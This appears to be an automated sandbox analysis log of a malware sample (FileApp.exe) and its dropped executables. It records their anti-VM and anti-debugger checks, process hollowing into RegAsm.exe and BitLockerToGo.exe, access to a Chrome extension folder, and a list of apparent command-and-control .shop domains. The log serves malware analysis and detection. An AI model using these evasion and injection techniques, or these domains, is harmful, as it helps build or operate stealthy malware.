Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: kPy9KuGWnhtidoY4IdmVbiaT.exe, kPy9KuGWnhtidoY4IdmVbiaT.exe, 00000007.00000002.3124653111.0000000001028000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: FileApp.exe, 00000000.00000000.2112885323.0000000000692000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: KWDYALOFJGZUXTEBGMAEYQJZQEJUSHGFSJJHXIAWXETHZSZCXATOVIRUNEH
Source: FileApp.exe, 00000000.00000002.2120357581.0000000003221000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: q1BODKZWBQQMLCMYVMCIXXAQEPJMQHJSTTKQSTJDLWPIDAGHWDTXN`
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E0D000.00000004.00000020.00020000.00000000.sdmp, kPy9KuGWnhtidoY4IdmVbiaT.exe, 00000007.00000002.3125271481.00000000014FE000.00000004.00000020.00020000.00000000.sdmp, kPy9KuGWnhtidoY4IdmVbiaT.exe, 00000007.00000002.3125271481.00000000014D5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3380418917.0000023733E2B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: kPy9KuGWnhtidoY4IdmVbiaT.exe, 00000007.00000002.3125271481.000000000148E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, 00000009.00000002.2730398887.0000000005D00000.00000004.08000000.00040000.00000000.sdmp, B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, 00000009.00000002.2600221718.00000000040E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: XLPHGFSPQHIXQJMWIYQNEBJBPSRAXIXVQJURCRMXGFAG
Source: B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, 00000009.00000000.2384928035.0000000000612000.00000002.00000001.01000000.0000000D.sdmp Binary or memory string: vMciv4FTWk
Source: kPy9KuGWnhtidoY4IdmVbiaT.exe, 00000007.00000002.3124653111.0000000001028000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: FileApp.exe, 00000000.00000002.2130547013.0000000005D20000.00000004.08000000.00040000.00000000.sdmp, FileApp.exe, 00000000.00000002.2120455815.0000000004221000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: NQPLQEMUWDVSEGGAGTZFUSSKMLSWZZHLRDKHCPZQSKPE
Source: FileApp.exe, 00000000.00000002.2120455815.0000000004221000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: hCLzvwEjrpbnzEwhXNXFGBXIZAYKTKFHNSJMXXSQXPDUPPISSNNZVDVOZHMLXRYKJQLBNJWUMPLHSGRTKZEHDCQNEPVFRWODTRYSNEDBETDHjLQKFJELXWCCPPPTLBRSPXGPTYVBWSUTVKRBACAXUAXCVJHNSYEFTQ4TVZLTIRMSALDCPEFWEYSSXCFHRBIGFOGEMHRISPNAWFSXDYPHYCLTNNCMKGP0HDPHSAHCDMQZEFXMZIVMVHGH>HDFRATRTNLSGHZWIZIRXFENQEEZPWRX@DMFBDPONVTBWVOAXTZSGJYCEBTAJQMTE*RSPSJGNNTAZNTHOEZKMSD`RIETTMIEZEYBRQJRNHSEMVSNUJHCJWLGNVQIDRRMWTZMIMILNTUANEPZFLPZQKLGHHGJKDTAPSAMTKGLNIEDKATDJVDDFVEEMHFIVHNDTRSIODDMDGNZSTOVDQOYZM6VMVKIAJAGEUTMHWUQUAJWGFJCDYbNZJKWACNUZWQXMKJTABCEYFTTVOGUUYUFQGAJYBOVVYQVRSUBTRZQDEQEOEROXTQXRDXDEODFNXKIHCZEWREOWTTYRXC:UIXMFMRGOBBYKZLHLBCTUBZCVNIUK2LPOLHALZEADMFBLFEADBNRUFEJZHIXWULRQTPZFTKNACEGTQFAPYHDPYDHLLIVV8OLMVCVQXIEXFCTZTNNHRRCMDXZIG(LVDQPIOMZJYCMKFTNODZfORYFNDQNGAADYLKKRCILOIDAYDOEPIHMUJKYCYNENGZIXIWCXKFfVLWACCLOYZGETQAJUDREGEFFSJYBMVQIWOEVGLZJJZKYSNCBBTLjPCLUSHWYCDMGKISISZFXQNFXCWKMTTYJHDDHPKPSRRNASZONOGBGR<GLBUXMWNNYZIJDNECORDWZMIYZCTSA.ANHNKGZTWXJCVNGSZFZYWGI*DQGYOQNENCSDMBIIGZFWQ>NJVEXNXMCCREESHHYHQBSCOIBEMTYRHnFTJQDGKIZKDHFHEFMDVUSASKFKJOVQIMQCZVJNZXWGMKJVOSYJZSXIE4GZCMALKPIHQZXYXIEBNWATMTUH\SHWPGTJQWTVIAUWTQFUITIFJVCRPKPBFCWRMNKRCHGNVBB@GVAFOARNLNFWZVBTVTYQTMTSVRUTSHQF*LGJBVHJIFWEUKOYHPFFQZHSZFZACAAUQEMRTBEWGHQFZQVDEYVWXEOTZDUb...bBODKZWBQQMLCMYVMCIXXAQEPJMQHJSTTKQSTJDLWPIDAGHWDTpSDMQWYAXEEZWTFDQNWMYYRHWXKLQHYULQPVZVOZGWJERCCXQYPSRDBZA\JZVNUEPUZXCOHYXBIXXTHBKZXKMENNCPQHOOCSKRLUZZBU0JEZKZRRKYGZFBZZANNEPWBXVhNADKTONGHAOGIGIHEHBTZKBBUGOZLOQBBUIAULKJKLRWQYQHSFHPZRWHDCCPPCMEHGLRDZQTIOJPAGQGWJBTAVWYVYQVWTXVIObFASDLKNWEIUWOQOGMFUDQQNSMETQOSUKBARVPLPLPJOFHRCMT6DHKHFEQPKVBFUICMRSSCHKHGSDHDEQSTSXTUOBFMBZUHIZPKVCEYQFRJNNOQSVhWZUQVXLXPDLVVHCVQLMYQOQIMBGFPNMZZHLDUEFHDAYKBHSYKYKHLBRPNXAMMEXLEICPSQASKFOXAKQWFNYLMDDQCSN0HDHYGMYAFMMADBFVFXAHJUYWLVWJWIPAPSGTNFKHUYZIIJDWTLVOENQMKEMBVCR*AKNDHULOHYDMKVGEBMCUKXBSHCOQTCIEJVEGROPHJGXWFLGUYDXTOWGKTCGDOLFYWFjUTYUNXFPVPTERQHYGJXLKEVNYDWIVBZXJQAEVKUMXLBRKNMWGQVARvLGMMMTHMSAUPNSPKWFXSIDYLGVDORGTZRGMZWSXMDATKGCUIYIOBFVQIIAF8EAUPJRSTWQERVNGWLGGDLEOCIULT<GXALPBIVLOIDYAJCURHEHUIBBDDVVPfQVIXYNZAAMYGGMGHHQBSSTJIIAGJHEMWMVJMZMEDZMBYLHXOLHVbLBYXFWJUFYJNMLRYABOBVFZDOVPSRMAQCSSSJYGBKLMNNNQGFlWZHVFCYAKPGBBJHQWPVEVVEXHYLSDRAMLSIHXBYLQTOISFGRFIVIFV`WGYUYFMOVRCWXNZQUNFHYPDGKDGMTFIFVYKJTMOIBCZTTZVK(KNTNMYRUGYMDDIFSAYUZNGWWXDXQFOBYLRPTMGOGBFKCWKMZUDMPTWZUXONV`QXIFHNZGXFNADAIVXXLBVXSHUUJCXCEXDVTQFKGOCZPJHOKDbMSETADBRRLEXYTHZYPGFZUAQEASPAMBQEVTZLXBFLYAVPHBBZrUBCHXJBUZHULAOZCRJMORPTXMMRAVUPGKQYBXARRMGUTATAIAOZSNKGFIHHHAYIBSKUVCAXEMJLVRDFYKBVPYXMWAQNHLKbFJWZCSDUXYULNPTCEDDJNZQTLGT
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000DCA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW`
Source: kPy9KuGWnhtidoY4IdmVbiaT.exe, 00000007.00000002.3125271481.000000000148E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware.(
Source: uht_7KlzJBHoKg010MzYxndX.exe, 0000000B.00000002.2650297590.000000000146C000.00000004.00000020.00020000.00000000.sdmp, m9GWTeQylsPUCcnTEkTCS8lf.exe, 0000000C.00000002.2684793497.000000000190E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, 00000009.00000000.2384928035.0000000000612000.00000002.00000001.01000000.0000000D.sdmp Binary or memory string: DEURKUJUSGIWVQOPRPWDRMHVYYEHDFBZIPNXTCMQEMUHYDLVICQWEFGRWZTLPCRMFJNFCQWPCFY
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging

Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Open window title or class name: regmonclass
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Open window title or class name: ollydbg
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Open window title or class name: filemonclass
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe File opened: NTICE
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe File opened: SICE
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe File opened: SIWVID
Source: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process queried: DebugPort
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_0041ACFA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 22_2_0041ACFA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_00404610 VirtualProtect ?,00000004,00000100,00000000 22_2_00404610
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Code function: 14_2_00406312 GetModuleHandleA,LoadLibraryA,GetProcAddress, 14_2_00406312
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00432CB0 mov eax, dword ptr fs:[00000030h] 2_2_00432CB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00432CB0 mov eax, dword ptr fs:[00000030h] 2_2_00432CB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_00419160 mov eax, dword ptr fs:[00000030h] 22_2_00419160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_00405000 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,memcpy,InternetCloseHandle,InternetCloseHandle, 22_2_00405000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_0041C8D9 SetUnhandledExceptionFilter, 22_2_0041C8D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_0041ACFA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 22_2_0041ACFA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_0041A718 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 22_2_0041A718
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_69CBAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 22_2_69CBAC62
Source: C:\Users\user\Desktop\FileApp.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: Yara match File source: Process Memory Space: kPy9KuGWnhtidoY4IdmVbiaT.exe PID: 3048, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: DSN_5xuwaC5nkP_MHzd7lLTl.exe PID: 7060, type: MEMORYSTR
Source: C:\Users\user\Desktop\FileApp.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\Documents\iofolko5\uht_7KlzJBHoKg010MzYxndX.exe Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe Code function: 5_2_030E2591 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread, 5_2_030E2591
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe NtProtectVirtualMemory: Direct from: 0x140F68E97
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe NtProtectVirtualMemory: Direct from: 0x14184DA5A
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe NtProtectVirtualMemory: Direct from: 0x140F42CBC
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe NtClose: Direct from: 0x141791AC9
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe NtProtectVirtualMemory: Direct from: 0x14183B5C6
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe NtMapViewOfSection: Direct from: 0x1417C8CFD
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe NtOpenFile: Direct from: 0x141829079
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe NtProtectVirtualMemory: Direct from: 0x140F741E1
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe NtProtectVirtualMemory: Direct from: 0x141821A46
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe NtUnmapViewOfSection: Direct from: 0x14181B636
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe NtProtectVirtualMemory: Direct from: 0x141817E99
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe NtProtectVirtualMemory: Indirect: 0x140F2B0BD
Source: C:\Users\user\Desktop\FileApp.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Memory written: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Documents\iofolko5\uht_7KlzJBHoKg010MzYxndX.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Memory written: C:\ProgramData\jewkkwnf\jewkkwnf.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe Memory written: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe base: 400000 value starts with: 4D5A
Source: uht_7KlzJBHoKg010MzYxndX.exe, 0000000B.00000002.2733299099.0000000001B50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: caffegclasiqwp.shop
Source: uht_7KlzJBHoKg010MzYxndX.exe, 0000000B.00000002.2733299099.0000000001B50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: stamppreewntnq.shop
Source: uht_7KlzJBHoKg010MzYxndX.exe, 0000000B.00000002.2733299099.0000000001B50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: stagedchheiqwo.shop
Source: uht_7KlzJBHoKg010MzYxndX.exe, 0000000B.00000002.2733299099.0000000001B50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: millyscroqwp.shop
Source: uht_7KlzJBHoKg010MzYxndX.exe, 0000000B.00000002.2733299099.0000000001B50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: evoliutwoqm.shop
Source: uht_7KlzJBHoKg010MzYxndX.exe, 0000000B.00000002.2733299099.0000000001B50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: condedqpwqm.shop
Source: uht_7KlzJBHoKg010MzYxndX.exe, 0000000B.00000002.2733299099.0000000001B50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: traineiwnqo.shop
Source: uht_7KlzJBHoKg010MzYxndX.exe, 0000000B.00000002.2733299099.0000000001B50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: locatedblsoqp.shop
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_004190A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 22_2_004190A0
Source: C:\Users\user\Desktop\FileApp.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\Desktop\FileApp.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Users\user\Desktop\FileApp.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 56B000
Source: C:\Users\user\Desktop\FileApp.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 58A000
Source: C:\Users\user\Desktop\FileApp.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 592000
Source: C:\Users\user\Desktop\FileApp.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 5D8000
Source: C:\Users\user\Desktop\FileApp.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: A0B008
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 456000
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 484000
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 10F1008
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 432000
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 450000
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 60A008
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 42F000
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43C000
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 651000
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 652000
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 835008
Source: C:\Users\user\Documents\iofolko5\uht_7KlzJBHoKg010MzYxndX.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2E40008
Source: C:\Users\user\Documents\iofolko5\uht_7KlzJBHoKg010MzYxndX.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000
Source: C:\Users\user\Documents\iofolko5\uht_7KlzJBHoKg010MzYxndX.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 401000
Source: C:\Users\user\Documents\iofolko5\uht_7KlzJBHoKg010MzYxndX.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 443000
Source: C:\Users\user\Documents\iofolko5\uht_7KlzJBHoKg010MzYxndX.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 446000
Source: C:\Users\user\Documents\iofolko5\uht_7KlzJBHoKg010MzYxndX.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 456000
Source: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2F06008
Source: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000
Source: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 401000
Source: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 440000
Source: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 443000
Source: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 452000
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 41E000
